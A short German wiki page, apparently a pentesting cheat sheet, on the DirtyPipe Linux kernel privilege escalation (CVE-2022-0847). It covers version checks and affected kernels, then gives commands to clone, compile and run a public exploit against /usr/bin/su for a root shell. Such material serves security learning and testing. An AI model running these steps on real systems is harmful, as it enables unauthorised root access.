CVE-2022-0847
Zur Navigation springen
Zur Suche springen
Privilege Escalation über Kernel-Exploit: DirtyPipe (CVE-2022-0847)
Zielsetzung
- Root-Rechte durch Kernel-Schwachstelle erhalten.
Wie entdeckt man die Schwachstelle?
- Kernel-Version prüfen
- uname -r
- Verwundbare Versionen
- Linux 5.8 bis 5.16.11 sind betroffen.
Voraussetzungen
| Bedingung | Beschreibung |
|---|---|
| Linux-Kernel-Version | 5.8 bis 5.16.11 |
| Lokaler Zugriff | Vorhanden |
| shell Zugriff | Vorhanden |
Angriff: Root-Rechte durch Exploit
- Exploit herunterladen
- git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploit.git
- cd CVE-2022-0847-DirtyPipe-Exploit
- Exploit kompilieren
- gcc -o dirtypipe dirtypipe.c
- Exploit ausführen
- ./dirtypipe /usr/bin/su
- Erwartung
- Root-Shell erhalten.
Hinweise
- Exploit manipuliert beliebige schreibgeschützte Dateien.
- Besonders effektiv gegen aktuelle ungehärtete Systeme.